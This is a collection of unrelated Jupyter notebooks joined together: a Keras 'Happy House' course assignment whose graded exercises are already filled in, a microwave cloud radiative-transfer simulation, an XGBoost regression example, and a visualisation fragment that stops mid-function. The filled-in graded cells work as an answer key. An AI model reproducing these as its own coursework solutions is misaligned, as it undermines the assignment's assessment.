Why are we using Keras? Keras was developed to enable deep learning engineers to build and experiment with different models very quickly. Just as TensorFlow is a higher-level framework than Python, Keras is an even higher-level framework and provides additional abstractions. Being able to go from idea to result with the least possible delay is key to finding good models. However, Keras is more restrictive than the lower-level frameworks, so there are some very complex models that you can implement in TensorFlow but not (without more difficulty) in Keras. That being said, Keras will work fine for many common models.
In this exercise, you'll work on the "Happy House" problem, which we'll explain below. Let's load the required packages and solve the problem of the Happy House!
```
import numpy as np
import keras
from keras import layers
from keras.layers import Input, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D
from keras.layers import AveragePooling2D, MaxPooling2D, Dropout, GlobalMaxPooling2D, GlobalAveragePooling2D
from keras.models import Model
from keras.preprocessing import image
from keras.utils import layer_utils
from keras.utils.data_utils import get_file
from keras.applications.imagenet_utils import preprocess_input
import pydot
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot
from keras.utils import plot_model
from kt_utils import *
import keras.backend as K
K.set_image_data_format('channels_last')
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
%matplotlib inline
```
**Note**: As you can see, we've imported a lot of functions from Keras. You can use them easily just by calling them directly in the notebook. Ex: `X = Input(...)` or `X = ZeroPadding2D(...)`.
## 1 - The Happy House
For your next vacation, you decided to spend a week with five of your friends from school. It is a very convenient house with many things to do nearby. But the most important benefit is that everybody has committed to be happy when they are in the house. So anyone wanting to enter the house must prove their current state of happiness.
<img src="images/happy-house.jpg" style="width:350px;height:270px;">
<caption><center> <u> <font color='purple'> **Figure 1** </u><font color='purple'> : **the Happy House**</center></caption>
As a deep learning expert, to make sure the "Happy" rule is strictly applied, you are going to build an algorithm that uses pictures from the front door camera to check if the person is happy or not. The door should open only if the person is happy.
You have gathered pictures of your friends and yourself, taken by the front-door camera. The dataset is labeled.
<img src="images/house-members.png" style="width:550px;height:250px;">
Run the following code to normalize the dataset and learn about its shapes.
```
X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()
# Normalize image vectors
X_train = X_train_orig/255.
X_test = X_test_orig/255.
# Reshape
Y_train = Y_train_orig.T
Y_test = Y_test_orig.T
print ("number of training examples = " + str(X_train.shape[0]))
print ("number of test examples = " + str(X_test.shape[0]))
print ("X_train shape: " + str(X_train.shape))
print ("Y_train shape: " + str(Y_train.shape))
print ("X_test shape: " + str(X_test.shape))
print ("Y_test shape: " + str(Y_test.shape))
```
**Details of the "Happy" dataset**:
- Images are of shape (64,64,3)
- Training: 600 pictures
- Test: 150 pictures
It is now time to solve the "Happy" Challenge.
## 2 - Building a model in Keras
Keras is very good for rapid prototyping. In just a short time you will be able to build a model that achieves outstanding results.
Here is an example of a model in Keras:
```python
def model(input_shape):
# Define the input placeholder as a tensor with shape input_shape. Think of this as your input image!
X_input = Input(input_shape)
# Zero-Padding: pads the border of X_input with zeroes
X = ZeroPadding2D((3, 3))(X_input)
# CONV -> BN -> RELU Block applied to X
X = Conv2D(32, (7, 7), strides = (1, 1), name = 'conv0')(X)
X = BatchNormalization(axis = 3, name = 'bn0')(X)
X = Activation('relu')(X)
# MAXPOOL
X = MaxPooling2D((2, 2), name='max_pool')(X)
# FLATTEN X (means convert it to a vector) + FULLYCONNECTED
X = Flatten()(X)
X = Dense(1, activation='sigmoid', name='fc')(X)
# Create model. This creates your Keras model instance, you'll use this instance to train/test the model.
model = Model(inputs = X_input, outputs = X, name='HappyModel')
return model
```
Note that Keras uses a different convention with variable names than we've previously used with numpy and TensorFlow. In particular, rather than creating and assigning a new variable on each step of forward propagation such as `X`, `Z1`, `A1`, `Z2`, `A2`, etc. for the computations for the different layers, in Keras code each line above just reassigns `X` to a new value using `X = ...`. In other words, during each step of forward propagation, we are just writing the latest value in the computation into the same variable `X`. The only exception was `X_input`, which we kept separate and did not overwrite, since we needed it at the end to create the Keras model instance (`model = Model(inputs = X_input, ...)` above).
**Exercise**: Implement a `HappyModel()`. This assignment is more open-ended than most. We suggest that you start by implementing a model using the architecture we suggest, and run through the rest of this assignment using that as your initial model. But after that, come back and take initiative to try out other model architectures. For example, you might take inspiration from the model above, but then vary the network architecture and hyperparameters however you wish. You can also use other functions such as `AveragePooling2D()`, `GlobalMaxPooling2D()`, `Dropout()`.
**Note**: You have to be careful with your data's shapes. Use what you've learned in the videos to make sure your convolutional, pooling and fully-connected layers are adapted to the volumes you're applying it to.
```
# GRADED FUNCTION: HappyModel
def HappyModel(input_shape):
"""
Implementation of the HappyModel.
Arguments:
input_shape -- shape of the images of the dataset
Returns:
model -- a Model() instance in Keras
"""
### START CODE HERE ###
# Feel free to use the suggested outline in the text above to get started, and run through the whole
# exercise (including the later portions of this notebook) once. Then come back and try out other
# network architectures as well.
# Define the input placeholder as a tensor with shape input_shape. Think of this as your input image!
X_input = Input(input_shape)
# Zero-Padding: pads the border of X_input with zeroes
X = ZeroPadding2D((3, 3))(X_input)
# CONV -> BN -> RELU Block applied to X
X = Conv2D(32, (7, 7), strides = (1, 1), name = 'conv0')(X)
X = BatchNormalization(axis = 3, name = 'bn0')(X)
X = Activation('relu')(X)
# MAXPOOL
X = MaxPooling2D((2, 2), name='max_pool')(X)
# FLATTEN X (means convert it to a vector) + FULLYCONNECTED
X = Flatten()(X)
X = Dense(1, activation='sigmoid', name='fc')(X)
# Create model. This creates your Keras model instance, you'll use this instance to train/test the model.
model = Model(inputs = X_input, outputs = X, name='HappyModel')
### END CODE HERE ###
return model
```
You have now built a function to describe your model. To train and test this model, there are four steps in Keras:
1. Create the model by calling the function above
2. Compile the model by calling `model.compile(optimizer = "...", loss = "...", metrics = ["accuracy"])`
3. Train the model on train data by calling `model.fit(x = ..., y = ..., epochs = ..., batch_size = ...)`
4. Test the model on test data by calling `model.evaluate(x = ..., y = ...)`
If you want to know more about `model.compile()`, `model.fit()`, `model.evaluate()` and their arguments, refer to the official [Keras documentation](https://keras.io/models/model/).
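As a hypothetical end-to-end sketch of the four steps on random toy data (the layer sizes, optimizer, and epoch count here are illustrative choices, not the assignment's solution):

```python
import numpy as np
from keras.layers import Input, Dense
from keras.models import Model

# Toy data standing in for the Happy House images (10 features, binary label).
X_toy = np.random.rand(32, 10)
Y_toy = (np.random.rand(32, 1) > 0.5).astype("float32")

# Step 1: create the model.
X_input = Input((10,))
X = Dense(1, activation="sigmoid")(X_input)
toy_model = Model(inputs=X_input, outputs=X)

# Step 2: compile it (binary classification -> binary cross-entropy).
toy_model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

# Step 3: train.
toy_model.fit(x=X_toy, y=Y_toy, epochs=2, batch_size=8, verbose=0)

# Step 4: evaluate; returns [loss, accuracy] because of the metrics argument.
loss, acc = toy_model.evaluate(x=X_toy, y=Y_toy, verbose=0)
```

The same four calls, with the conv architecture and the real dataset, are exactly what the exercises below ask for.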
**Exercise**: Implement step 1, i.e. create the model.
```
### START CODE HERE ### (1 line)
happyModel = HappyModel((64,64,3))
### END CODE HERE ###
```
**Exercise**: Implement step 2, i.e. compile the model to configure the learning process. Choose the 3 arguments of `compile()` wisely. Hint: the Happy Challenge is a binary classification problem.
```
### START CODE HERE ### (1 line)
happyModel.compile(optimizer = "Adam", loss = "binary_crossentropy", metrics = ["accuracy"])
### END CODE HERE ###
```
**Exercise**: Implement step 3, i.e. train the model. Choose the number of epochs and the batch size.
```
### START CODE HERE ### (1 line)
happyModel.fit(x = X_train, y = Y_train, epochs = 40, batch_size = 16)
### END CODE HERE ###
```
Note that if you run `fit()` again, the `model` will continue to train with the parameters it has already learnt instead of reinitializing them.
**Exercise**: Implement step 4, i.e. test/evaluate the model.
```
### START CODE HERE ### (1 line)
preds = happyModel.evaluate(x = X_test, y = Y_test)
### END CODE HERE ###
print()
print ("Loss = " + str(preds[0]))
print ("Test Accuracy = " + str(preds[1]))
```
If your `happyModel()` function worked, you should have observed much better than random-guessing (50%) accuracy on the train and test sets.
To give you a point of comparison, our model gets around **95% test accuracy in 40 epochs** (and 99% train accuracy) with a mini batch size of 16 and "adam" optimizer. But our model gets decent accuracy after just 2-5 epochs, so if you're comparing different models you can also train a variety of models on just a few epochs and see how they compare.
If you have not yet achieved a very good accuracy (let's say more than 80%), here are some things you can play around with to try to achieve it:
- Try using blocks of CONV->BATCHNORM->RELU such as:
```python
X = Conv2D(32, (3, 3), strides = (1, 1), name = 'conv0')(X)
X = BatchNormalization(axis = 3, name = 'bn0')(X)
X = Activation('relu')(X)
```
until your height and width dimensions are quite low and your number of channels quite large (≈32 for example). You are encoding useful information in a volume with a lot of channels. You can then flatten the volume and use a fully-connected layer.
- You can use MAXPOOL after such blocks. It will help you lower the dimension in height and width.
- Change your optimizer. We find Adam works well.
- If the model is struggling to run and you get memory issues, lower your batch_size (12 is usually a good compromise)
- Run on more epochs, until you see the train accuracy plateauing.
Even if you have achieved a good accuracy, please feel free to keep playing with your model to try to get even better results.
**Note**: If you perform hyperparameter tuning on your model, the test set actually becomes a dev set, and your model might end up overfitting to the test (dev) set. But just for the purpose of this assignment, we won't worry about that here.
## 3 - Conclusion
Congratulations, you have solved the Happy House challenge!
Now, you just need to link this model to the front-door camera of your house. We unfortunately won't go into the details of how to do that here.
<font color='blue'>
**What we would like you to remember from this assignment:**
- Keras is a tool we recommend for rapid prototyping. It allows you to quickly try out different model architectures. Are there any applications of deep learning to your daily life that you'd like to implement using Keras?
- Remember how to code a model in Keras and the four steps leading to the evaluation of your model on the test set. Create->Compile->Fit/Train->Evaluate/Test.
## 4 - Test with your own image (Optional)
Congratulations on finishing this assignment. You can now take a picture of your face and see if you could enter the Happy House. To do that:
1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub.
2. Add your image to this Jupyter Notebook's directory, in the "images" folder
3. Write your image's name in the following code
4. Run the code and check if the algorithm is right (0 is unhappy, 1 is happy)!
The training/test sets were quite similar; for example, all the pictures were taken against the same background (since a front door camera is always mounted in the same position). This makes the problem easier, but a model trained on this data may or may not work on your own data. But feel free to give it a try!
```
### START CODE HERE ###
img_path = 'images/my_image.jpg'
### END CODE HERE ###
img = image.load_img(img_path, target_size=(64, 64))
imshow(img)
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
print(happyModel.predict(x))
```
## 5 - Other useful functions in Keras (Optional)
Two other basic features of Keras that you'll find useful are:
- `model.summary()`: prints the details of your layers in a table with the sizes of its inputs/outputs
- `plot_model()`: plots your graph in a nice layout and saves it as a ".png" if you'd like to share it on social media ;). The file shows up under "File" then "Open..." in the upper bar of the notebook; `SVG()` renders the graph inline.
Run the following code.
```
happyModel.summary()
plot_model(happyModel, to_file='HappyModel.png')
SVG(model_to_dot(happyModel).create(prog='dot', format='svg'))
```
## Cloud observations
This notebook simulates microwave and sub-mm observations of idealized clouds in the atmosphere. Its purpose is to illustrate the general radiative properties of clouds observed from space- or airborne remote sensing instruments.
The simulations are performed using the [parts](https://github.com/simonpf/parts) package, which provides a high-level interface to the [Atmospheric Radiative Transfer Simulator (ARTS)](https://www.radiative-transfer.org).
```
from parts.utils.notebook_setup import *
```
## Sensors
Simulations are performed for selected channels from the ICI and MWI passive radiometers.
```
from parts.sensor import MWI, ICI
mwi = MWI(stokes_dimension = 1, channel_indices = [2, 7, 9, 12, 15])
mwi.sensor_line_of_sight = np.array([180.0])
mwi.sensor_position = np.array([500e3])
ici = ICI(stokes_dimension = 1, channel_indices = [1, 3, 5, 8, 10])
ici.sensor_line_of_sight = np.array([180.0])
ici.sensor_position = np.array([500e3])
sensors = [ici, mwi]
```
Optionally, simulations can also be performed for the CloudSat cloud radar.
```
from parts.sensor import CloudSat
cloud_sat = CloudSat(stokes_dimension = 1)
cloud_sat.sensor_line_of_sight = np.array([180.0])
cloud_sat.sensor_position = np.array([500e3])
cloud_sat.range_bins = np.linspace(0, 20e3, 41) # Edges of range bins [m]
# Uncomment to include CloudSat in simulation.
sensors += [cloud_sat]
```
## Atmosphere
The following assumptions are made for the radiative transfer calculations:
- One-dimensional atmosphere
- Observations over ocean
- Background atmosphere consisting of oxygen, nitrogen and water vapor
These assumptions are implemented by the `StandardAtmosphere` preconfigured atmosphere model
provided by `parts`.
```
%load_ext autoreload
%autoreload 2
from parts.models import StandardAtmosphere
atmosphere = StandardAtmosphere()
```
### Atmospheric data
To perform a numeric simulation, in addition to the abstract description of the atmospheric configuration to be simulated, the specific atmospheric state (i.e. temperature, pressure, and so on) must be known.
For this, `parts` provides standard data providers that supply climatological data for typical atmospheric regimes.
Here the `Tropical` data provider is used, which describes a typical tropical atmosphere.
```
from parts.data.atmosphere import Tropical
z = np.linspace(0, 20e3, 41)
data_provider = Tropical(z = z)
```
To illustrate this we can plot the data defining the atmospheric state that is provided by the data provider.
```
p = data_provider.get_pressure()
t = data_provider.get_temperature()
q = data_provider.get_H2O()
f, axs = plt.subplots(1, 3, figsize = (7, 5))
ax = axs[0]
ax.plot(p / 100, z / 1e3, c = "C0")
ax.set_xscale("log")
ax.set_xlabel("p [hPa]")
ax.set_ylabel("z [km]")
ax.set_ylim([0, 20])
ax.set_title("Pressure")
ax = axs[1]
ax.plot(t, z / 1e3, c = "C1")
ax.set_xlabel("T [K]")
ax.set_ylim([0, 20])
ax.set_title("Temperature")
ax = axs[2]
ax.plot(q, z / 1e3, c = "C2")
ax.set_xlabel("q [mol/mol]")
ax.set_ylim([0, 20])
ax.set_title("$H_2O$")
plt.tight_layout()
```
## Clear sky calculations
To determine the effect of clouds in the atmospheric column, we start by calculating clear-sky radiances as a reference. To run the simulation:
```
from parts.simulation import ArtsSimulation
simulation = ArtsSimulation(atmosphere = atmosphere,
sensors = sensors,
data_provider = data_provider)
simulation.setup(verbosity = 0)
simulation.run()
```
The results of the simulation can be accessed via the `y` attribute of the sensors used in the simulation. To store the values for later use, they have to be explicitly copied; otherwise they will be overwritten by the next simulation.
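The need for explicit copies comes from numpy aliasing: if the sensor overwrites its result array in place, a plain assignment would keep pointing at the same buffer. A minimal, stand-alone illustration (the array `y` here is just a stand-in for a sensor's `y` attribute):

```python
import numpy as np

y = np.array([1.0, 2.0, 3.0])  # stands in for a sensor's y attribute
alias = y                      # no copy: both names share the same buffer
saved = np.copy(y)             # independent snapshot
y[:] = 0.0                     # the "next simulation" overwrites in place
```

After the overwrite, `alias` sees the new zeros while `saved` still holds the original values.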
```
f_ici = np.copy(ici.f_grid)
y_ici_clear = np.copy(ici.y)
f_mwi = np.copy(mwi.f_grid)
y_mwi_clear = np.copy(mwi.y)
y_cs_clear = np.copy(cloud_sat.y)
z_cs = cloud_sat.range_bins
z_cs = 0.5 * (z_cs[1:] + z_cs[:-1])
```
### Results
Here we simply plot the results from the clear sky simulation.
```
from matplotlib.gridspec import GridSpec
f = plt.figure(figsize = (13, 5))
gs = GridSpec(1, 4)
handles = []
labels = []
#
# Radar
#
ax = plt.subplot(gs[0, 0])
handles += ax.plot(y_cs_clear, z_cs / 1e3, c = "C0")
labels += ["CloudSat, clear"]
ax.set_xlabel("Radar reflectivity [dBz]")
ax.set_ylabel("Altitude [km]")
ax.set_title("Radar signal")
#
# Passive
#
ax = plt.subplot(gs[0, 1:3])
handles += ax.plot(f_mwi / 1e9, y_mwi_clear, c = "C1", marker = "o")
labels += ["MWI, clear"]
handles += ax.plot(f_ici / 1e9, y_ici_clear, c = "C2", marker = "o")
labels += ["ICI, clear"]
ax.set_title("Brightness temperatures")
ax.set_xlabel("Frequency [GHz]")
ax.set_ylabel("$T_B$ [K]")
#
# Legend
#
ax = plt.subplot(gs[0, -1])
ax.legend(handles = handles, labels = labels, loc = "center left")
ax.set_axis_off()
plt.tight_layout()
```
## Adding clouds to the simulation
Two additional steps are required to take clouds into account in the simulation:
- Add scattering species to the atmosphere model
- Provide the data describing the specific state of the clouds
### Scattering species
Clouds are represented in the atmosphere model as **scattering species**, since their most important interaction with radiation in the microwave region that we are interested in is through scattering.
To define a scattering species, we must specify
- a particle shape
- a particle size distribution (PSD)
### Available shapes
`parts` provides some predefined particle shapes from the [ARTS single scattering database](https://zenodo.org/record/1175573).
```
from parts.scattering.ssdb import shapes
display(shapes)
```
### Particle size distribution
As particle size distribution we will be using the `D14MN` PSD, a modified gamma distribution parametrized by the **mass density** and a vertical scaling factor, the **intercept parameter** $N_0^*$.
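To get a feeling for this family of distributions, a generic (unnormalized) modified gamma PSD can be evaluated directly with numpy. Note that this is only a rough stand-in: the actual `D14MN` PSD applies a specific normalization that ties $N_0^*$ and the mass density together, which is omitted here, and the slope parameter `lam` below is an arbitrary illustrative value.

```python
import numpy as np

def modified_gamma_psd(d, n0=1e8, alpha=2.0, beta=1.0, lam=2e3):
    """Generic modified gamma PSD: dN/dD = n0 * d**alpha * exp(-(lam * d)**beta).

    Illustrative only; the D14MN PSD used below adds a normalization
    linking n0 to the mass density.
    """
    return n0 * d ** alpha * np.exp(-(lam * d) ** beta)

d = np.logspace(-5, -2, 101)   # particle diameters [m]
dn_dd = modified_gamma_psd(d)  # number density per diameter [m^-4]
```

Increasing `alpha` shifts the mode toward larger particles; increasing `lam` truncates the large-particle tail faster.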
#### Liquid
So to define a liquid cloud species we simply create a scattering species with a PSD and the liquid sphere shape.
For liquid clouds it is also necessary to set a temperature minimum for the PSD below which the PSD will be zero. The reason for this is that the scattering properties for the liquid shape are not available at low temperatures.
```
from parts.scattering import ScatteringSpecies
from parts.scattering.psd import D14MN
psd = D14MN(alpha = 2.0, # first shape parameter
beta = 1.0, # second shape parameter
rho = 1000.0) # density [kg/m^3]
psd.t_min = 270.0
i = [s.__repr__() for s in shapes].index("LiquidSphere")
shape = shapes[i] # Liquid sphere
liquid_cloud = ScatteringSpecies("liquid_cloud", psd, shape)
```
To illustrate this we can plot the particle shape and the PSD for different parameter values.
```
import matplotlib.image as mi
import seaborn as sns
#
# Some colors.
#
sns.reset_orig()
cs = [sns.light_palette("navy", 4),
sns.light_palette("firebrick", 4),
sns.light_palette("seagreen", 4)]
#
# Figure setup
#
f = plt.figure(figsize = (12, 5))
gs = GridSpec(1, 4)
# PSD plots.
ax = plt.subplot(gs[0, 0:2])
x = np.logspace(-5, -2, 101)
handles = []
labels = []
for j, n0 in enumerate(np.array([1e6, 1e8, 1e10])):
for i, md in enumerate(np.array([1e-5, 1e-4, 1e-3])):
psd.mass_density = md
psd.intercept_parameter = n0
y = psd.evaluate(x).data.ravel()
handles += ax.plot(x, y, c = cs[j][1 + i])
labels += [r"$m = {0:.0e} kg / m^3$"
" \n"
r"$N_0^* = {1:.0e} m^{{-4}}$".format(md, n0)]
ax.set_yscale("log")
ax.set_xscale("log")
ax.set_ylim([1e0, 1e10])
ax.set_xlim([1e-5, 1e-2])
ax.set_xlabel("$D_{eq}$ [m]")
ax.set_ylabel("$dN/dD$ [$m^{-4}$]")
ax.set_title("Particle size distribution")
# Legend.
ax = plt.subplot(gs[0, 2])
ax.legend(handles = handles, labels = labels, ncol = 1, loc = "center")
ax.set_axis_off()
# Shape image.
ax = plt.subplot(gs[0, 3])
img = mi.imread(shape.img)
ax.imshow(img)
ax.set_aspect(1)
ax.set_axis_off()
ax.set_title("Particle shape")
plt.tight_layout()
```
### Ice
For ice we obviously choose a different particle shape and also modify the PSD shape a bit.
As for liquid clouds, for ice clouds it is necessary to set a **temperature maximum** for the PSD above which the PSD will be zero. The reason for this is that the scattering properties for the ice shape are not available at high temperatures.
```
psd = D14MN(alpha = -1.0, # first shape parameter
beta = 3.0, # second shape parameter
rho = 917.0) # density [kg/m^3]
psd.t_max = 280.0
i = [s.__repr__() for s in shapes].index("LargePlateAggregate")
shape = shapes[i] # Large plate aggregate
ice_cloud = ScatteringSpecies("ice_cloud", psd, shape)
import matplotlib.image as mi
import seaborn as sns
#
# Some colors.
#
sns.reset_orig()
cs = [sns.light_palette("navy", 4),
sns.light_palette("firebrick", 4),
sns.light_palette("seagreen", 4)]
#
# Figure setup
#
f = plt.figure(figsize = (12, 5))
gs = GridSpec(1, 4)
# PSD plots.
ax = plt.subplot(gs[0, 0:2])
x = np.logspace(-5, -2, 101)
handles = []
labels = []
for j, n0 in enumerate(np.array([1e6, 1e8, 1e10])):
for i, md in enumerate(np.array([1e-5, 1e-4, 1e-3])):
psd.mass_density = md
psd.intercept_parameter = n0
y = psd.evaluate(x).data.ravel()
handles += ax.plot(x, y, c = cs[j][1 + i])
labels += [r"$m = {0:.0e} kg / m^3$"
" \n"
r"$N_0^* = {1:.0e} m^{{-4}}$".format(md, n0)]
ax.set_yscale("log")
ax.set_xscale("log")
ax.set_ylim([1e0, 1e10])
ax.set_xlim([1e-5, 1e-2])
ax.set_xlabel("$D_{eq}$ [m]")
ax.set_ylabel("$dN/dD$ [$m^{-4}$]")
ax.set_title("Particle size distribution")
# Legend.
ax = plt.subplot(gs[0, 2])
ax.legend(handles = handles, labels = labels, ncol = 1, loc = "center")
ax.set_axis_off()
# Shape image.
ax = plt.subplot(gs[0, 3])
img = mi.imread(shape.img)
ax.imshow(img)
ax.set_aspect(1)
ax.set_axis_off()
ax.set_title("Particle shape")
plt.tight_layout()
```
### Cloud data
To simulate a specific cloud configuration, we need to specify the PSD parameters for each scattering species for the atmospheric column. We do this by defining a `CloudDataProvider` class that generates 1D Gaussian clouds.
```
class CloudDataProvider:
def __init__(self, name, z, mass_density = 1e-4, center = 10e3, thickness = 1e3):
self.z = z
self.mass_density = mass_density
self.center = center
self.thickness = thickness
self.name = name
self.__dict__["get_" + name + "_mass_density"] = self.get_mass_density
self.__dict__["get_" + name + "_intercept_parameter"] = self.get_intercept_parameter
def get_mass_density(self):
md = self.mass_density * np.exp(- ((self.z - self.center) / self.thickness) ** 2)
md[md < 1e-8] = 0.0
return md
def get_intercept_parameter(self):
return 1e8 * np.ones(self.z.shape)
liquid_cloud_data = CloudDataProvider("liquid_cloud", z, mass_density = 1e-4, center = 3e3)
ice_cloud_data = CloudDataProvider("ice_cloud", z, mass_density = 5e-4, center = 12e3, thickness = 1.5e3)
```
Let's plot this to see how the clouds look.
#### Liquid
```
from parts.utils.plots import plot_psds
f, axs = plt.subplots(1, 3, figsize = (10, 5))
md = liquid_cloud_data.get_liquid_cloud_mass_density()
ax = axs[0]
ax.plot(md, z / 1e3)
ax.set_xscale("log")
ax.set_ylim([0, 20])
ax.set_xlim([1e-5, 1e-3])
ax.set_ylabel("Altitude [km]")
ax.set_xlabel("Mass density [$kg / m^3$]")
ax.set_title("Mass density")
n0 = liquid_cloud_data.get_liquid_cloud_intercept_parameter()
ax = axs[1]
ax.plot(n0, z / 1e3)
ax.set_xscale("log")
ax.set_ylim([0, 20])
ax.set_xlim([1e5, 1e12])
ax.set_title("$N_0^*$")
ax.set_xlabel("$N_0^*$ $[m^{-4}]$")
ax.yaxis.set_ticklabels([])
x = np.logspace(-5, -2, 101)
psd.mass_density = md
psd.intercept_parameter = n0
y = psd.evaluate(x).data.T
ax = axs[2]
plot_psds(x, y[:, ::3], z[::3] / 1e3, 0.3, 0, ax)
ax.set_xlim([1e-5, 1e-2])
ax.yaxis.set_ticks([])
ax.set_title("Particle size distributions")
ax.set_xlabel("$D_{eq}$ [m]")
```
### Ice cloud
```
from parts.utils.plots import plot_psds
f, axs = plt.subplots(1, 3, figsize = (10, 5))
md = ice_cloud_data.get_ice_cloud_mass_density()
ax = axs[0]
ax.plot(md, z / 1e3, c = "C2")
ax.set_xscale("log")
ax.set_ylim([0, 20])
ax.set_xlim([1e-5, 1e-3])
ax.set_ylabel("Altitude [km]")
ax.set_xlabel("m [$kg / m^3$]")
ax.set_title("Mass density")
n0 = ice_cloud_data.get_ice_cloud_intercept_parameter()
ax = axs[1]
ax.plot(n0, z / 1e3, c = "C2")
ax.set_xscale("log")
ax.set_ylim([0, 20])
ax.set_xlim([1e5, 1e12])
ax.set_title("$N_0^*$")
ax.set_xlabel("$N_0^*$ $[m^{-4}]$")
ax.yaxis.set_ticklabels([])
x = np.logspace(-5, -2, 101)
psd.mass_density = md
psd.intercept_parameter = n0
y = psd.evaluate(x).data.T
ax = axs[2]
plot_psds(x, y[:, ::3], z[::3] / 1e3, 0.3, 2, ax)
ax.set_xlim([1e-5, 1e-2])
ax.yaxis.set_ticks([])
ax.set_title("Particle size distributions")
ax.set_xlabel("$D_{eq}$ [m]")
```
## Simulating cloudy-sky radiances
To simulate the cloudy atmosphere all that is left to do is:
- Add scattering species to atmosphere model
- Combine data provider for tropical background atmosphere with cloud data providers
```
from parts.data_provider import CombinedProvider
atmosphere.scatterers = [liquid_cloud, ice_cloud]
data_provider_cloudy = CombinedProvider(data_provider, liquid_cloud_data, ice_cloud_data)
```
### Run the simulation
```
simulation.data_provider = data_provider_cloudy
simulation.setup(verbosity = 0)
simulation.run()
y_ici_cloud = np.copy(ici.y)
y_mwi_cloud = np.copy(mwi.y)
y_cs_cloud = np.copy(cloud_sat.y)
```
## Results
```
from matplotlib.gridspec import GridSpec
f = plt.figure(figsize = (13, 5))
gs = GridSpec(1, 4)
handles = []
labels = []
#
# Radar
#
ax = plt.subplot(gs[0, 0])
handles += ax.plot(y_cs_clear, z_cs / 1e3, c = "C0", ls = "--")
labels += ["CloudSat, clear"]
handles += ax.plot(y_cs_cloud, z_cs / 1e3, c = "C0")
labels += ["CloudSat, cloudy"]
ax.set_xlabel("Radar reflectivity [dBz]")
ax.set_ylabel("Altitude [km]")
ax.set_title("Radar signal")
#
# Passive
#
ax = plt.subplot(gs[0, 1:3])
handles += ax.plot(f_mwi / 1e9, y_mwi_clear, c = "C1", marker = "x", ls = "--")
labels += ["MWI, clear"]
handles += ax.plot(f_mwi / 1e9, y_mwi_cloud, c = "C1", marker = "o")
labels += ["MWI, cloudy"]
handles += ax.plot(f_ici / 1e9, y_ici_clear, c = "C2", marker = "x", ls = "--")
labels += ["ICI, clear"]
handles += ax.plot(f_ici / 1e9, y_ici_cloud, c = "C2", marker = "o")
labels += ["ICI, cloudy"]
ax.set_xlabel("Frequency [GHz]")
ax.set_ylabel("$T_B$ [K]")
ax.set_title("Brightness temperatures")
#
# Legend
#
ax = plt.subplot(gs[0, -1])
ax.legend(handles = handles, labels = labels, loc = "center left")
ax.set_axis_off()
plt.tight_layout()
```
| github_jupyter |
# Example 01: General Use of XGBoostRegressor
[](https://colab.research.google.com/github/slickml/slick-ml/blob/master/examples/regression/example_01_XGBoostRegressor.ipynb)
### Google Colab Configuration
```
# !git clone https://github.com/slickml/slick-ml.git
# %cd slick-ml
# !pip install -r requirements.txt
```
### Local Environment Configuration
```
# Change path to project root
%cd ../..
```
### Import Python Libraries
```
%load_ext autoreload
# widen the screen
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:95% !important; }</style>"))
# change the path and loading class
import os, sys
import pandas as pd
import numpy as np
import seaborn as sns
%autoreload
from slickml.regression import XGBoostRegressor
```
-----
# XGBoostRegressor Docstring
```
help(XGBoostRegressor)
```
## Example
```
# load the data; note this is a multi-target regression dataset
df = pd.read_csv("data/reg_data.csv")
df.head(2)
# define X, y based on one of the targets
y = df.TARGET1.values
X = df.drop(["TARGET1", "TARGET2"], axis=1)
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y,
test_size=0.2,
shuffle=True,
random_state=1367)
# train a model
reg = XGBoostRegressor(num_boost_round=300,
metrics="rmsle",
sparse_matrix=False,
scale_mean=False,
scale_std=False,
importance_type=None,
params=None)
reg.fit(X_train, y_train)
# feature importance (or reg.get_feature_importance())
reg.feature_importance_
# plot feature importance
reg.plot_feature_importance()
# pred target values (or reg.y_pred_)
y_pred = reg.predict(X_test)
y_pred[:10]
# shap summary plot of validation set
reg.plot_shap_summary(validation=True)
# shap summary bar plot of validation set
reg.plot_shap_summary(plot_type="bar")
# shap summary plot (violin)
reg.plot_shap_summary(plot_type="violin")
# plot shap waterfall plot
reg.plot_shap_waterfall()
```
## You can use the RegressionMetrics class to evaluate your model
```
from slickml.metrics import RegressionMetrics
reg_metrics = RegressionMetrics(y_test, y_pred)
reg_metrics.plot()
# model's fitting params (or reg.get_params())
reg.get_params()
```
| github_jupyter |
```
import ipywidgets as widgets
from sidepanel import SidePanel
from regulus.utils import io
from regulus.models import *
from regulus.measures import *
from ipyregulus import DataWidget, TreeWidget, BaseTreeView, DetailsView
from ipyregulus.alg.view import *
gauss = io.load('data/gauss4_mc')
gauss.add_attr('quadratic', quadratic_model)
gauss.add_attr('quadratic_fitness', quadratic_fitness)
tree = TreeWidget(gauss.tree)
v1 = show_tree(tree, attr='fitness')
p1 = SidePanel(title='mc/linear')
with p1:
display(v1.view, v1.filter)
gauss.add_attr('max', node_max)
v1.view.attr = 'max'
v1.filter.attr = 'max'
v2 = show_tree(tree, attr='quadratic_fitness')
p2 = SidePanel(title='mc/quadratic')
with p2:
display(v2.view, v2.filter)
```
### MC / Details
```
data = DataWidget(data=gauss)
details = DetailsView(data=data)
widgets.link((v2.view, 'details'), (details, 'show'))
p2 = SidePanel(title='MC/details')
with p2:
display(details)
```
## Check model
```
import plotly.graph_objs as go  # note: the legacy plotly.plotly module (unused here) has moved to the chart_studio package
import numpy as np
import pandas as pd
layout = go.Layout(
title='Gauss',
autosize=False,
width=800,
height=800,
margin=dict(
l=65,
r=50,
b=65,
t=90
)
)
def surface(tree, node_id, n=25, color='rgba(217, 217, 217, 0.14)'):
node = tree.find(lambda _,n: n.id == node_id)
model = tree.attr['quadratic'][node]
pts = node.data.x
print(f'id={node_id} size={len(pts)}')
sx = np.linspace( pts['x'].min(), pts['x'].max(), n)
sy = np.linspace( pts['y'].min(), pts['y'].max(), n)
v = model.predict(np.array(np.meshgrid(sx, sy)).T.reshape(-1,2)).reshape(n, n)
i_sxy = tree.regulus.pts.inverse(pd.DataFrame({'x': sx, 'y': sy}))
print(f"x:[{i_sxy['x'].min()}, {i_sxy['x'].max()}], y:[{i_sxy['y'].min()}, {i_sxy['y'].max()}]")
